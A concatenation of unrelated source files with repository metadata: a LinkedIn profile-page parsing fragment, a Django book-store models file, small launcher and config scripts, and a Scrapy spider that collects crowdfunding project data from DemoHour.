    i.e. the profile has a "see all" interests detail view.
    '''
    return re.search(r'/detail/interests/', str(web_html)) is not None
def get_extra_interests(web_html):
    '''Recieves the html of the expanded see all interests and returns a list with the interests and the number of followers.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile.
    Returns
    -------
    list
        [0] : Interests titles
        [1] : Interests number of followers
    '''
    interests = []
    followers = []
    entries = web_html.findAll('li', attrs={'class':' entity-list-item'})
    if entries:
        for entry in entries:
            title_html = entry.find('span', attrs={'class':'pv-entity__summary-title-text'})
            interests.append(title_html.text.strip())
            count_html = entry.find('p', attrs={'class':'pv-entity__follower-count Sans-15px-black-55%'})
            count_text = count_html.text.strip()
            # Strip the label words (plural forms first), spaces and commas.
            for token in ('followers', 'follower', 'members', 'member', ' ', ','):
                count_text = count_text.replace(token, '')
            followers.append(count_text)
    return [interests, followers]
def get_posts(web_html):
    '''Recieves a LinkedIn profile activity information, returns a list of the articles, posts and liked posts shown.
    The function identifies the posts and sends the posts html to the function analyse_post.
    Each of the three returned lists contains one analyse_post result per item
    ([text, titles, link, likes, comments]); a single all-'NULL' placeholder is
    appended when a category is empty.
    Parameters
    ----------
    web_html
        Html code of a LinkedIn profile activity page.
    Returns
    -------
    list
        [0] : Articles written
        [1] : Posts written
        [2] : Liked posts
    '''
    articles_pool = []
    posts_pool = []
    liked_pool = []
    articles_flag = False
    posts_flag = False
    liked_posts_flag = False
    # Bug fix: name_text was unbound (UnboundLocalError) when the name span
    # was missing; default to '' so the comparison below still works.
    name_text = ''
    name_html = web_html.find('span', attrs={'class':'hoverable-link-text'})
    if name_html:
        name_text = name_html.text.strip()
    voyager_feed = web_html.find('div', attrs={'class':'pv-recent-activity-detail__feed-container feed-container-theme ember-view'})
    if voyager_feed:
        articles_stack = voyager_feed.find_all('article')
        print ('Number of activity posts: ' + str(len(articles_stack)))
        for article_html in articles_stack:
            if 'mh0' not in article_html['class']:
                continue
            bar_html = article_html.find('div', attrs={'class':'feed-base-top-bar Sans-13px-black-70% ember-view'})
            if bar_html:
                breaken_bar = bar_html.text.strip().split(' ')
                if ('likes' in breaken_bar) or ('liked' in breaken_bar):
                    # Post liked by the candidate
                    liked_posts_flag = True
                    liked_pool.append(analyse_post(article_html))
                # 'commented' / 'replied' activity is recognised but not
                # retrieved at the moment.
            else:
                # Get the source byline to decide who authored the item
                source_html = article_html.find('h3', attrs={'class':'feed-base-image-description__byline Sans-13px-black-55%'})
                source_text = source_html.text.strip() if source_html else ''
                if source_text:
                    source_no_linkedin = source_text.replace(' on LinkedIn', '')
                    if source_no_linkedin == name_text:
                        # Article written by the candidate.
                        # Bug fix: the result was appended to articles_stack
                        # (the iteration list) instead of articles_pool, so
                        # written articles were silently lost.
                        articles_flag = True
                        articles_pool.append(analyse_post(article_html))
                    else:
                        # Post shared from somebody else
                        posts_flag = True
                        posts_pool.append(analyse_post(article_html))
                else:
                    # No byline: treat as a post as well.
                    # Bug fix: posts_flag was not set here, so a 'NULL'
                    # placeholder could be appended alongside real posts.
                    posts_flag = True
                    posts_pool.append(analyse_post(article_html))
    # Keep the historical contract: every empty category gets one placeholder.
    if not articles_flag:
        articles_pool.append(['NULL', 'NULL', 'NULL', 'NULL', 'NULL'])
    if not posts_flag:
        posts_pool.append(['NULL', 'NULL', 'NULL', 'NULL', 'NULL'])
    if not liked_posts_flag:
        liked_pool.append(['NULL', 'NULL', 'NULL', 'NULL', 'NULL'])
    return [articles_pool, posts_pool, liked_pool]
def analyse_post(post_html):
    '''Receives the html of one post, returns information about that post.
    Parameters
    ----------
    post_html
        Html element (BeautifulSoup tag) of a single LinkedIn post.
    Returns
    -------
    list
        [0] : Post text ('NULL' when absent)
        [1] : Post title ('NULL' when absent)
        [2] : Shared link source ('NULL' when absent)
        [3] : Number of likes ('0' when absent)
        [4] : Number of comments ('0' when absent)
    '''
    # Class names LinkedIn has used over time for the post body container.
    labels_pool = [ 'feed-s-update__description feed-s-inline-show-more-text ember-view',
                    'feed-base-update__description feed-base-inline-show-more-text ember-view',
                    'feed-base-update__description feed-base-inline-show-more-text is-empty ember-view',
                    'feed-base-inline-show-more-text is-empty ember-view',
                    'feed-base-inline-show-more-text ember-view']
    # Get text: first label whose div holds non-empty text wins.
    text = 'NULL'
    for label in labels_pool:
        text_html = post_html.find('div', attrs={'class': label})
        if text_html:
            item_text = text_html.text.strip()
            if item_text:
                text = unicodetoascii(item_text)
                break
    if text == 'NULL':
        # Fall back to the "mini update" layout.
        text_html = post_html.find('p', attrs={'class': 'feed-base-main-content--mini-update Sans-15px-black-70% feed-base-main-content ember-view'})
        if text_html:
            item_text = text_html.text.strip()
            if item_text:
                text = unicodetoascii(item_text)
        # A reshare keeps the original post's text in a dedicated span.
        original_html = post_html.find('span', attrs={'data-control-name': 'original_share'})
        if original_html:
            original_text = original_html.text.strip()
            # BUG FIX: this previously tested 'item_text', which can be
            # unbound here (NameError) or stale; the reshare's own text is
            # what decides whether to override.
            if original_text:
                text = unicodetoascii(original_text)
    # Title shared
    title_text = 'NULL'
    title_html = post_html.find('h2', attrs={'class': 'feed-base-image-description__headline Sans-15px-black-85%-semibold'})
    if title_html:
        title_text = unicodetoascii(title_html.text.strip())
    # Get source (byline of the shared link)
    source_text = 'NULL'
    source_html = post_html.find('h3', attrs={'class': 'feed-base-image-description__byline Sans-13px-black-55%'})
    if source_html:
        source_text = unicodetoascii(source_html.text.strip())
    # Get number of likes and number of comments
    likes_number = '0'
    likes_html = post_html.find('button', attrs={'class': 'feed-base-social-counts__num-likes feed-base-social-counts__count-value Sans-13px-black-55% hoverable-link-text'})
    if likes_html:
        like_spans = likes_html.find_all('span')
        likes_text = like_spans[0].text.strip()
        likes_number = re.findall(r'\d+', str(likes_text))[0]
    comments_number = '0'
    comments_html = post_html.find('button', attrs={'class': 'feed-base-social-counts__num-comments feed-base-social-counts__count-value Sans-13px-black-55% hoverable-link-text'})
    if comments_html:
        comment_spans = comments_html.find_all('span')
        comment_text = comment_spans[0].text.strip()
        comments_number = re.findall(r'\d+', str(comment_text))[0]
    # Alternate (older) markup: counts live in a <ul> of buttons tagged with
    # data-control-name; values found here override the ones above.
    numbers_block = post_html.find('ul', attrs={'class': 'feed-s-social-counts ember-view'})
    if numbers_block:
        for item in numbers_block.children:
            if len(item) > 1:
                cosa = BeautifulSoup(str(item), 'html.parser')
                button_html = cosa.find('button')
                span_one = button_html.find('span')
                span_text = span_one.text.strip()
                # e.g. "1,234 Likes" -> "1234"
                span_broken = span_text.split(' ')
                span_number = span_broken[0].replace(',', '')
                if button_html['data-control-name'] == 'likes_count':
                    likes_number = span_number
                if button_html['data-control-name'] == 'comments_count':
                    comments_number = span_number
    return [text, title_text, source_text, likes_number, comments_number]
def get_followers_number(web_html):
    '''Receives a LinkedIn profile activity html, returns the follower count.
    Parameters
    ----------
    web_html
        Html code (BeautifulSoup document) of a LinkedIn profile.
    Returns
    -------
    str
        Follower count as scraped text; '0' when the sidebar is missing.
    '''
    side_box = web_html.find('aside', attrs={'class': 'pv-recent-activity-detail__left-rail left-rail'})
    if not side_box:
        return '0'
    followers_html = side_box.find('p', attrs={'class': 'pv-recent-activity-top-card__follower-count Sans-15px-black-70%'})
    if not followers_html:
        return '0'
    raw = followers_html.text.strip()
    # Strip the plural label first so the singular pass cannot leave an 's'.
    raw = raw.replace('Followers', '').replace('Follower', '')
    return str(raw)
def unicodetoascii(text):
    """Map common UTF-8 punctuation (and its escaped mojibake form) to
    plain ASCII and normalise whitespace.
    Each pattern appears twice: once with doubled backslashes (for text in
    which the escape sequences survived as literal ``\\xe2...`` characters)
    and once as the raw character sequence itself.
    http://www.utf8-chartable.de/unicode-utf8-table.pl?start=8192&number=128&utf8=string-literal
    Parameters
    ----------
    text : str
        Raw text scraped from the page.
    Returns
    -------
    str
        Cleaned text with single spaces and no leading/trailing spaces.
    """
    # Order matters: escaped-literal patterns must be handled before the
    # final catch-all backslash removal.
    replacements = [
        ('\\n', ' '),
        ('\\xe2\\x80\\x99', "'"), ('\xe2\x80\x99', "'"),
        ('\\xc3\\xa9', 'e'), ('\xc3\xa9', 'e'),
        ('\\xe2\\x80\\x90', '-'), ('\xe2\x80\x90', '-'),
        ('\\xe2\\x80\\x91', '-'), ('\xe2\x80\x91', '-'),
        ('\\xe2\\x80\\x92', '-'), ('\xe2\x80\x92', '-'),
        ('\\xe2\\x80\\x93', '-'), ('\xe2\x80\x93', '-'),
        # BUG FIX: the em dash pattern previously mixed escaped and raw
        # forms ('\xe2\\x80\x94') and therefore never matched.
        ('\\xe2\\x80\\x94', '-'), ('\xe2\x80\x94', '-'),
        ('\\xe2\\x80\\x98', "'"), ('\xe2\x80\x98', "'"),
        ('\\xe2\\x80\\x9b', "'"), ('\xe2\x80\x9b', "'"),
        ('\\xe2\\x80\\x9c', '"'), ('\xe2\x80\x9c', '"'),
        ('\\xe2\\x80\\x9d', '"'), ('\xe2\x80\x9d', '"'),
        ('\\xe2\\x80\\x9e', '"'), ('\xe2\x80\x9e', '"'),
        ('\\xe2\\x80\\x9f', '"'), ('\xe2\x80\x9f', '"'),
        ('\\xe2\\x80\\xa6', '...'), ('\xe2\x80\xa6', '...'),
        ('\\xe2\\x80\\xb2', "'"), ('\xe2\x80\xb2', "'"),
        ('\\xe2\\x80\\xb3', "'"), ('\xe2\x80\xb3', "'"),
        ('\\xe2\\x80\\xb4', "'"), ('\xe2\x80\xb4', "'"),
        ('\\xe2\\x80\\xb5', "'"), ('\xe2\x80\xb5', "'"),
        ('\\xe2\\x80\\xb6', "'"), ('\xe2\x80\xb6', "'"),
        ('\\xe2\\x80\\xb7', "'"), ('\xe2\x80\xb7', "'"),
        ('\\xe2\\x81\\xba', "+"), ('\xe2\x81\xba', "+"),
        ('\\xe2\\x81\\xbb', "-"), ('\xe2\x81\xbb', "-"),
        ('\\xe2\\x81\\xbc', "="), ('\xe2\x81\xbc', "="),
        ('\\xe2\\x81\\xbd', "("), ('\xe2\x81\xbd', "("),
        ('\\xe2\\x81\\xbe', ")"), ('\xe2\x81\xbe', ")"),
        ('\\xc2\\xa0', ""), ('\xc2\xa0', ""),
        ('\n', ' '),
        ('\\', ''),
    ]
    for old, new in replacements:
        text = text.replace(old, new)
    # Collapse runs of spaces into one.
    while '  ' in text:
        text = text.replace('  ', ' ')
    # BUG FIX: the original indexed TEXT[0] and raised IndexError on an
    # empty string; strip() is safe and equivalent after the collapse.
    return text.strip(' ')
if __name__=="__main__":
print ('Hi') | [
"javierpascualr@gmail.com"
] | javierpascualr@gmail.com |
16d0afee5579f5327094a63c8498acf5c907d634 | ddcd523c50aabf23cea5f409036499b5fa4859df | /book/models.py | 2445ad754ce9c3aca7a3e30754f7d731fcb4eae5 | [] | no_license | nadyrbek97/kitep_back | 6edb7ea7255bb697777535bff0b9474821c2361b | 8691a75538711bdd8070a6f3351cd4a17ec70f00 | refs/heads/master | 2023-04-29T14:15:38.710373 | 2019-07-07T15:06:56 | 2019-07-07T15:06:56 | 192,690,079 | 0 | 0 | null | 2023-04-21T20:32:40 | 2019-06-19T08:21:18 | CSS | UTF-8 | Python | false | false | 3,514 | py | from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from . import choices
class Writer(models.Model):
    """An author; referenced by Book through a nullable foreign key."""
    # Author's display name, also used as the string representation.
    full_name = models.CharField(max_length=250)
    def __str__(self):
        # Human-readable label shown in the Django admin and shell.
        return self.full_name
class Category(models.Model):
    """Top-level genre; SubCategory rows point here via `main_genre`."""
    title = models.CharField(max_length=250)
    class Meta:
        # Avoid Django's default auto-plural "categorys" in the admin.
        verbose_name_plural = "Categories"
    def __str__(self):
        return self.title
class SubCategory(models.Model):
    """Second-level genre nested under a Category."""
    title = models.CharField(max_length=250)
    # Parent category; deleting the parent cascades to its subcategories.
    main_genre = models.ForeignKey(Category,
                                   on_delete=models.CASCADE,
                                   related_name="subcategories")
    class Meta:
        verbose_name_plural = "Sub Categories"
    def __str__(self):
        return self.title
    def get_absolute_url(self):
        # Canonical detail page URL for this subcategory.
        return reverse('sub-category-detail', kwargs={'pk': self.pk})
class Collection(models.Model):
    """A curated group of books with a cover image."""
    title = models.CharField(max_length=500)
    image = models.ImageField(upload_to="collection_images")
    def __str__(self):
        # e.g. "Summer reads (12)" -- title plus the number of books held.
        return "{} ({})".format(self.title, str(self.books.count()))
class Book(models.Model):
    """A book for sale/download, linked to writer, categories, collection,
    tags and user likes."""
    title = models.CharField(max_length=250)
    description = models.TextField()
    # Page count; verbose_name 'page' is what the admin form displays.
    pages = models.PositiveIntegerField(default=0,
                                        verbose_name='page')
    # Stock quantity.
    amount = models.PositiveIntegerField(default=0)
    price = models.PositiveIntegerField(default=0)
    # Restricted to the choices declared in choices.BOOK_LANGUAGE.
    language = models.CharField(max_length=20,
                                default='English',
                                choices=choices.BOOK_LANGUAGE)
    # Stored as text, not an integer (allows e.g. ranges or unknowns).
    published_year = models.CharField(max_length=10)
    # Cover image; falls back to a bundled placeholder when omitted.
    image = models.ImageField(upload_to="book_images",
                              default="book_images/default.png",
                              blank=True)
    # The downloadable book file itself (optional).
    file = models.FileField(upload_to="book_files",
                            null=True)
    # Author; optional, and deleting the writer deletes their books.
    writer = models.ForeignKey(Writer,
                               null=True,
                               blank=True,
                               on_delete=models.CASCADE,
                               related_name="books")
    sub_category = models.ManyToManyField(SubCategory,
                                          related_name="books")
    # Optional membership in a curated Collection.
    collection = models.ForeignKey(Collection,
                                   null=True,
                                   blank=True,
                                   on_delete=models.CASCADE,
                                   related_name="books")
    # Free-form tags provided by django-taggit.
    tags = TaggableManager()
    # Users who liked this book.
    likes = models.ManyToManyField(User,
                                   related_name="book_likes",
                                   blank=True)
    def __str__(self):
        # e.g. "Dune(1965)" -- title immediately followed by year in parens.
        return self.title + "(" + self.published_year + ")"
    def get_absolute_url(self):
        # Canonical detail page URL for this book.
        return reverse('book-detail', kwargs={'pk': self.pk})
class Comment(models.Model):
    """A user's comment on a book, ordered oldest-first."""
    # Commented book; removing the book removes its comments.
    book = models.ForeignKey(Book,
                             on_delete=models.CASCADE,
                             related_name="comments")
    # Comment author; removing the user removes their comments.
    user = models.ForeignKey(User,
                             on_delete=models.CASCADE,
                             related_name="comments")
    body = models.TextField()
    # Set once when the row is first saved.
    created = models.DateTimeField(auto_now_add=True)
    class Meta:
        # Chronological order: oldest comments first.
        ordering = ('created', )
    def __str__(self):
        return "Comment by {} on {}".format(self.user.username, self.book.title)
| [
"nadyrbek97@gmail.com"
] | nadyrbek97@gmail.com |
541e437fb4ea37f3049fb19b4f1687b8576a3ff7 | b9ffd9b9e88d497ee904e42dfd825080ee7713a9 | /files_from_working_server/waterscan-api/venv/bin/virtualenv | a6ba8866dbc0c5dce7c6083a719ce94eacc20629 | [] | no_license | naturalis/waterscan-ecosoft | a3d8e91d6634108b585a71c051f15216c8c3fdf4 | a2bcc3e656bbfb6ca08cd7e8ef7f119f0004d049 | refs/heads/master | 2021-06-15T05:26:15.457593 | 2019-06-21T09:39:22 | 2019-06-21T09:39:22 | 191,738,087 | 0 | 0 | null | 2021-05-06T19:36:36 | 2019-06-13T10:01:34 | Python | UTF-8 | Python | false | false | 239 | #!/home/ubuntu/waterscan-api/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from virtualenv import main
if __name__ == '__main__':
    # Strip a trailing "-script.py(w)"/".exe" from argv[0] so virtualenv
    # reports a clean program name, then delegate to its CLI entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"martenhoogeveen@gmail.com"
] | martenhoogeveen@gmail.com | |
23d620c4b360e8d3af9b8c9bca1267847ffdc581 | d9a720e7e550579578ba66ee9135b3d4d333dc53 | /fabfile.py | f586cc4beaedbf96beb8679ceb720079aa883a6c | [] | no_license | fromageball/taxi | 7a99d46d7901322f9f103a6311f1600c5f74ac8b | aaba5673a27b0185f9519d9b8ee81633dfe6b81d | refs/heads/master | 2020-05-17T00:14:57.483690 | 2013-08-06T01:34:50 | 2013-08-06T01:34:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 36 | py | def hello():
print("Hello world!")
| [
"fromageball2@ps200061.dreamhostps.com"
] | fromageball2@ps200061.dreamhostps.com |
7920769fb9df2c743760034190be86dff1f1947a | 65c0ef56c2e2c3e1646a610f49e6dd06f2c6102d | /src/libs/cmd/implement/emulator/fastboot.py | e8c8437bb490f5e1cb28f6289ccb8449e2873cad | [
"MIT"
] | permissive | VirtualVFix/AndroidTestFramework | d3411f328a793ee7b007c4736983204aae81b739 | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | refs/heads/master | 2020-08-11T14:48:12.454415 | 2019-10-12T10:20:43 | 2019-10-12T10:20:43 | 214,582,560 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | # All rights reserved by forest fairy.
# You cannot modify or share anything without sacrifice.
# If you don't agree, keep calm and don't look at code bellow!
__author__ = "VirtualV <https://github.com/virtualvfix>"
__date__ = "09/22/17 14:27"
from .cmd import Cmd
from libs.cmd.implement.base.fastboot import Fastboot
from libs.cmd.implement.base.cmd import Cmd as CmdBase
#: Replace :class:`implement.base.cmd.Cmd` class by :class:`implement.emulator.cmd.Cmd`
#: After class replace Fastboot emulator class have same signature as Fastboot base
Fastboot.__bases__ = tuple([x if not issubclass(x, CmdBase) else Cmd for x in Fastboot.__bases__])
| [
"github.com/virtualvfix"
] | github.com/virtualvfix |
d38cc05d6855728cca643e5465316346c6fc15f0 | 964fbc4bf2950cbbe463a33dafcf0e54dedc4c81 | /Webeloperss/wsgi.py | 4321494600271535f62d9e4081dbd74ab9145361 | [] | no_license | fast-falcon/django_project2 | 057ff6904fbb8f28aae06c248db8a526cf725866 | 2bd99ec5891635edea5180a488b0d51c840ed752 | refs/heads/master | 2020-04-14T00:31:38.884572 | 2018-12-29T19:34:22 | 2018-12-29T19:34:22 | 163,535,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
WSGI config for Webeloperss project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI application.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Webeloperss.settings')
# WSGI callable used by application servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"pouriaff7171@gmail.com"
] | pouriaff7171@gmail.com |
3eee4d4542d35cf399d9ec34d7297cd55f76de42 | 1eca4c0a9f738bb0ab6257256d3bbf05376344a9 | /DemoHour/spiders/DemoSpider.py | 39a2827ea004fd86d86b647e4ece0a57e3277689 | [] | no_license | gzou107/DemonHour | 257de668ce5a1bf9b05a11fc1dfd26abf3727682 | 636c68244b2c5c8c4aa3aac91565e00cfbc85ffe | refs/heads/master | 2016-09-05T17:51:33.531343 | 2013-07-11T06:50:05 | 2013-07-11T06:50:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,358 | py | from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from DemoHour.items import Proj_Item, Proj_Owner_Item, Proj_Supporter, Proj_Topic, Proj_Incentive_Options_Item, User_Item
from scrapy.http.request import Request
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.loader import XPathItemLoader
import re
import urlparse
from decimal import *
class DemoSpider(CrawlSpider):
name = 'DemoHourSpider'
domain = ['demohour.com']
start_urls = [
'http://www.demohour.com/projects/318807',
'http://www.demohour.com/projects/319076',
# 'http://www.demohour.com/projects/discover/5_0_0_6?page=1', 319076
"""
'http://www.demohour.com/projects/318262',
'http://www.demohour.com/projects/318807',
'http://www.demohour.com/projects/319076',
'http://www.demohour.com/projects/317898',
'http://www.demohour.com/projects/319276',
'http://www.demohour.com/projects/319178',
'http://www.demohour.com/projects/319106',
'http://www.demohour.com/projects/317125',
'http://www.demohour.com/projects/320867',
'http://www.demohour.com/projects/318508',
'http://www.demohour.com/projects/318747',
"""
# 'http://www.demohour.com/', 319076, 317898, 319276, 319178, 319106, 317125, 320867, 318508, 318747
# 'http://www.demohour.com/projects/discover/0_0_0_5'
]
# , 'http://www.demohour.com/projects/317769']
# SgmlLinkExtractor(allow=('demohour.com/projects/[0-9]+/backers'))
# 318262 320144
# http://www.demohour.com/projects/317272
# backers_extractor = SgmlLinkExtractor(allow=('/projects/318262/backers',), deny=('page=1$',))
# supporter_name = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/text()").extract()
# deny=('page=1$',)
# proj_table_extractor = SgmlLinkExtractor(allow=('/projects/[\d]+$',),deny=('page=1$',) )
# backers_table_extractor = SgmlLinkExtractor(allow=('/projects/[\d]+/backers?',),deny=('page=1$',), )
# users_table_extractor = SgmlLinkExtractor(allow=('/[\d]+$',),deny=('page=1$',), )
#success_proj_extractor = SgmlLinkExtractor(allow=('/projects/318262$',),deny=('page=1$',) )
#backers_table_extractor = SgmlLinkExtractor(allow=('/projects/318262/backers?',),deny=('page=1$',), )
proj_table_extractor = SgmlLinkExtractor(allow=('/projects/319076',),deny=('page=1$',) )
backers_table_extractor = SgmlLinkExtractor(allow=('/projects/319076/backers?',),deny=('page=1$',), )
# users_table_extractor = SgmlLinkExtractor(allow=('/[\d7]+$',),deny=('page=1$',), )
# '/projects/309168$', '/projects/320084$', '/projects/319703$' deny=('page=1$',)
# proj_sidebar_funding = SgmlLinkExtractor(allow=('/projects/318262/posts$',), )
rules = (
# Extract link matching 'backers?page= and parse them with the spider's method, parse_one_supporters_page
# allow=('backers?page=')
# Rule(success_proj_extractor, callback='parse_success_proj_entry', follow = True), # This must comes before next one in order to extract all the backer information
Rule(backers_table_extractor, callback='parse_backers_links', follow = True), # This must comes before next one in order to extract all the backer information
# Rule(success_proj_extractor, callback='parse_success_proj_entry', follow = True), # This must comes before next one in order to extract all the backer information
Rule(proj_table_extractor, callback = 'parse_proj_info', follow = True),
# Rule(users_table_extractor, callback='parse_users', follow = True),
# Rule(proj_sidebar_funding, callback = 'parse_sidebar_funding',follow = False),
# Extract link matching
)
    def parse_success_proj_entry(self, response):
        """Parse a discovery/listing page: schedule every successful
        project's detail link and also re-parse this response itself.
        """
        hxs = HtmlXPathSelector(response)
        # Relative hrefs of the successful projects listed on this page.
        success_projects = hxs.select("//div[@id='projects']/ul[@class='project-one']/li[@class='project-titile']/a/@href")
        print "find success projects urls %s" %success_projects
        for success_project in success_projects:
            success_projects_full_url = self.add_url_prefix(success_project.extract())
            print " we find one success project url, and its url = %s" %success_projects_full_url
            # Schedule each project detail page for parse_proj_info.
            yield Request(urlparse.urljoin("http://www.demohour.com/",success_project.extract()), callback = self.parse_proj_info)
        # The listing response may itself carry project info; re-yield items.
        for item in self.parse_proj_info(response):
            yield item
        # NOTE(review): the triple-quoted block below is an inert string
        # expression (dead code from an earlier revision); it never runs.
        """
        for supporter in self.parse_backers_links(response): # we have supporter information here
            print "supporter name:", supporter['supporter_name']
            print "supporter url:", supporter['supporter_url']
            print "supporter icon:", supporter['supporter_icon']
            print "supporter support time", supporter['supporter_support_time']
            print "supporter support amount", supporter['supporter_support_amount']
            print "supporter support total proj count", supporter['supporter_total_support_proj']
            supporter['supporter_proj_id'] = PROJ_ID
            yield supporter
        """
def add_url_prefix(self, url):
return "http://www.demohour.com" + url
def parse_proj_info(self, response):
hxs = HtmlXPathSelector(response)
##################################################################################################################
# section of proj table
# (proj_url, proj_id(PK), proj_name, proj_funding_target, proj_current_funding_amount, proj_current_funding_percentage, proj_status, proj_left_over_time, proj_owner_name,
# proj_owner_location, proj_supporter_count, proj_surfer_count, proj_topic_count)
###################################################################################################################
proj = Proj_Item()
# get proj url, add prefix to get the complete url
proj_url = hxs.select("//div[@class='ui-tab']/div[@class='ui-tab-top']/h1/a/@href").extract()
if len(proj_url) != 1:
self.log("Parse the proj url error. %s" %response.url)
return
else:
proj['proj_url'] = self.add_url_prefix(proj_url[0])
# one very important id -->Proj_Id
# if len(
PROJ_ID = proj_url[0].split('/')
if len(PROJ_ID) != 3:
self.log("Parse Proj_id error. %s" %response.url)
else:
PROJ_ID = PROJ_ID[len(PROJ_ID) - 1]
proj['proj_id'] = PROJ_ID
# get the proj name
proj_title = hxs.select("//div[@class='ui-tab']/div[@class='ui-tab-top']/h1/a/text()").extract()
if len(proj_title) != 1:
self.log("Parse the proj name error. %s" %response.url)
else:
proj['proj_name'] = proj_title[0]
projs_sidebar_funding = hxs.select("//div[@class='sidebar-funding']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-warming']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-success']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-failure']")
if(len(projs_sidebar_funding) != 1):
self.log("Parse the proj table error. %s" %response.url)
print "Parse the proj table error. %s" %response.url
else:
# get proj_funding_target
p = projs_sidebar_funding[0]
proj_funding_target = p.select(".//div[@class='sidebar-money-raised-num-t']/b/text()").extract()
print proj_funding_target
if len(proj_funding_target) == 1:
proj['proj_funding_target'] = proj.clean_proj_funding_target(proj_funding_target[0])
# get proj_current_funding_amount
proj_current_funding_amount = p.select(".//div[@class='sidebar-money-raised-num']/b/text()").extract()
print proj_current_funding_amount
if len(proj_current_funding_amount) == 1:
proj['proj_current_funding_amount'] = proj.clean_proj_current_funding_amount(proj_current_funding_amount[0])
# get proj_current_funding_percentage
proj_current_funding_percentage = p.select(".//span[@class='sidebar-percentage-progress-span']/text()").extract()
print proj_current_funding_percentage
if len(proj_current_funding_percentage) != 1:
self.log("Parse the proj_current_funding_percentage at url = %s" %response.url)
else:
percentage = re.search('[\d]+', proj_current_funding_percentage[0])
if percentage == None:
self.log("Parse the proj_current_funding_percentage at url = %s" %response.url)
else:
percentage = percentage.group(0)
proj['proj_current_funding_percentage'] = Decimal(percentage.strip('"'))/100
# this is how many people support this proj
proj_supporter_count = p.select(".//div[@class='sidebar-number-days-l']/b/b/text()").extract()
print "support num:", proj_supporter_count
if len(proj_supporter_count) == 1:
proj['proj_supporter_count'] = proj_supporter_count[0]
# this is how many people view this proj
proj_surfer_count = p.select(".//div[@class='sidebar-number-days-m']/b/b/text()").extract()
print "people view ", proj_surfer_count
if len(proj_surfer_count) == 1:
proj['proj_surfer_count'] = proj_surfer_count[0]
# get topic of the proj
topic_count = hxs.select("//ul[@class='ui-tab-menu']/li/a/span[@id='posts_count']/text()").extract()
if len(topic_count) != 1:
self.log("Parse topic count error. %s" %response.url)
print "Parse topic count error. %s" %response.url
else:
proj['proj_topic_count'] = topic_count[0]
# get the proj_status
proj_status = p.select(".//div[@class='sidebar-number-days-r']/span/text()").extract()
if len(proj_status) != 1:
self.log("Parse proj status error. %s" %response.url)
print "Parse proj status error. %s" %response.url
else:
proj['proj_status'] = proj_status[0]
# get how many days left
proj_leftover_time = p.select(".//div[@class='sidebar-number-days-r']/b/b/text()").extract()
print "days left ", proj_leftover_time
if len(proj_leftover_time) == 1:
proj['proj_leftover_time'] = proj_leftover_time[0]
# get the unit of left_over
proj_leftover_time_units = p.select(".//div[@class='sidebar-number-days-r']/b/text()").extract()
if len(proj_leftover_time_units) == 1:
proj['proj_leftover_time_unit'] = 0 # proj complete
elif len(proj_leftover_time_units) == 2:
proj['proj_leftover_time_unit'] = proj_leftover_time_units[1]
else:
self.log("Can not parse proj left over time at url=%s" %response.url)
print "Parse proj left over time error. %s" %response.url
# get proj_owner information
projs_owner = hxs.select("//div[@class='project-by']")
if len(projs_owner) != 1:
self.log("Parse proj owner error. %s" %response.url)
else:
p = projs_owner[0]
proj_owner_owner_name = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
if len(proj_owner_owner_name) == 1:
proj['proj_owner_name'] = proj_owner_owner_name[0]
# get proj_location --> this wil be extracted in another table
# reason is this information may not be available at back page, only exist in main page
yield proj
# end of section of proj table
##################################################################################################################
##################################################################################################################
# section of section of proj_owner_table
# (proj_owner_owner_id(PK), proj_owner_proj_id(PK), proj_owner_owner_name, proj_owner_star_level, proj_owner_last_log_in_time,
# proj_owner_own_proj_count, proj_owner_support_proj_count )
##################################################################################################################
projs_owner = hxs.select("//div[@class='project-by']")
if len(projs_owner) != 1:
self.log("Parse the proj_owner error. %s" %response.url)
print "Parse the proj_owner error. %s" %response.url
else:
p = projs_owner[0]
proj_owner = Proj_Owner_Item()
proj_owner_owner_id = p.select(".//a[@class='project-by-img-r-author']/@href").extract()
print "proj name url: ", proj_owner_owner_id
if len(proj_owner_owner_id) != 1:
self.log("Parse proj owner id from page %s error" %response.url)
else:
owner_id = re.search('[0-9]+$', proj_owner_owner_id[0])
if owner_id == None:
self.log("Extract the proj owner id from url = %s error" %response.url)
else:
proj_owner['proj_owner_owner_id'] = owner_id.group(0)
proj_owner['proj_owner_proj_id'] = PROJ_ID
proj_owner_owner_name = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
print "proj name: ", proj_owner_owner_name
if len(proj_owner_owner_name) == 1:
proj_owner['proj_owner_owner_name'] = proj_owner_owner_name[0]
proj_owner_star_level = p.select(".//div[@class='project-by-img-r']/div[@class='icon-sun-m']/a/text()").extract()
print "proj proj_owner_star_level: ", proj_owner_star_level
if len(proj_owner_star_level) == 1:
proj_owner['proj_owner_star_level'] = proj_owner_star_level[0]
proj_owner_last_log_in_time = p.select(".//div[@class='project-by-last-time']/text()").extract()
print "proj last update time,", proj_owner_last_log_in_time
